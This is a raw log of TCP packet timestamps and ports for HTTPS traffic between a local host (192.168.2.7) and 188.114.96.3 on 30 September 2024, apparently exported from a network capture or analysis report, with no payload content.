                                                                                                                                                                        Sep 30, 2024 18:19:11.142007113 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.142031908 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.142038107 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.142064095 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.142092943 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.142502069 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.142530918 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.142569065 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.142575026 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.142601967 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.142613888 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.143170118 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.143203974 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.143240929 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.143246889 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.143274069 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.143291950 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.143644094 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.143673897 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.143732071 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.143738985 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.143776894 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.144175053 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.144200087 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.144237995 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.144244909 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.144270897 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.144284964 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.185137987 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.185173035 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.185300112 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.185308933 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.185357094 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.230196953 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.230230093 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.230453968 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.230464935 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.230514050 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.231914997 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.231941938 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.232006073 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.232012987 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.232050896 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.232702971 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.232729912 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.232768059 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.232774019 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.232801914 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.232822895 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.233110905 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.233130932 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.233165026 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.233170986 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.233198881 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.233220100 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.233364105 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.233383894 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.233421087 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.233426094 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.233453035 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.233474016 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.234122038 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.234144926 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.234189034 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.234194994 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.234224081 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.234242916 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.234435081 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.234498024 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.234503031 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.234525919 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.234570026 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.251600027 CEST49701443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.251614094 CEST44349701188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.849497080 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.849550962 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:11.849623919 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.857389927 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:11.857422113 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.321377039 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.321460962 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.343772888 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.343803883 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.344132900 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.370522976 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.415399075 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.486366034 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488480091 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488516092 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488542080 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.488554955 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488569021 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488595963 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.488629103 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488662958 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.488663912 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488675117 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488723040 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.488734961 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488804102 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.488842964 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.488850117 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.491826057 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.491866112 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.491877079 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.546168089 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.572428942 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.572513103 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.572546959 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.572547913 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.572561979 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.572602987 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.572609901 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.572648048 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.572678089 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.572685003 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.573484898 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.573523045 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.573530912 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.573674917 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.573704958 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.573704958 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.573724985 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.573756933 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.574397087 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.574592113 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.574628115 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.574631929 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.574642897 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.574681997 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.575195074 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.575258017 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.575293064 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.575299978 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.575432062 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.575468063 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.575475931 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.613100052 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.613137960 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.613162994 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.613178968 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.613214016 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.659286022 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.659415960 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.659450054 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.659454107 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.659470081 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.659501076 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.659508944 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.659776926 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.659822941 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.659830093 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.659868002 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.660181046 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.660224915 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.660235882 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.660243034 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.660280943 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.661056042 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.661108017 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.661117077 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.661133051 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.661170006 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.661878109 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.661909103 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.661930084 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.661937952 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.661958933 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.662996054 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.663038969 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.663048029 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.663088083 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.663165092 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.663213968 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.663222075 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.663265944 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.663862944 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.663917065 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.701515913 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.701565981 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.701591015 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.701603889 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.701616049 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.746511936 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.746560097 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.746567965 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.746587038 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.746603966 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.746612072 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.746629000 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.746650934 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.746656895 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.746678114 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.746726990 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.746762037 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.746767998 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.746803999 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.747023106 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.747056961 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.747070074 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.747076988 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.747096062 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.747114897 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.747564077 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.747608900 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.747680902 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.747726917 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.747879982 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.747929096 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.747939110 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.747952938 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.747977018 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.747993946 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.748584032 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.748629093 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.748646021 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.748684883 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.748765945 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.748810053 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.748816967 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.748862028 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.749639988 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.749691010 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.749691963 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.749702930 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.749728918 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.749746084 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.749824047 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.749874115 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.750452042 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.750497103 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.750680923 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.750722885 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.750726938 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.750735044 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.750777006 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.789151907 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.789235115 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.789495945 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.789545059 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.789700985 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.789743900 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.789747000 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.789757967 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.789783955 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.789803982 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.833868980 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.833928108 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.833934069 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.833952904 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.833973885 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.833996058 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.834003925 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.834018946 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.834059000 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.834064007 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.834100008 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.834986925 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.835005999 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.835042000 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.835050106 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.835063934 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.835083961 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.835988998 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.836014032 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.836061001 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.836070061 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.836102009 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.836749077 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.836787939 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.836816072 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.836822033 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.836841106 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.836846113 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.836863995 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.836869001 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.836895943 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.836963892 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.875437975 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.875463963 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.875519991 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.875534058 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.875561953 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.875586033 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.877178907 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.877207041 CEST44349704188.114.96.3192.168.2.7
                                                                                                                                                                        Sep 30, 2024 18:19:12.877238035 CEST49704443192.168.2.7188.114.96.3
                                                                                                                                                                        Sep 30, 2024 18:19:12.877247095 CEST44349704188.114.96.3192.168.2.7
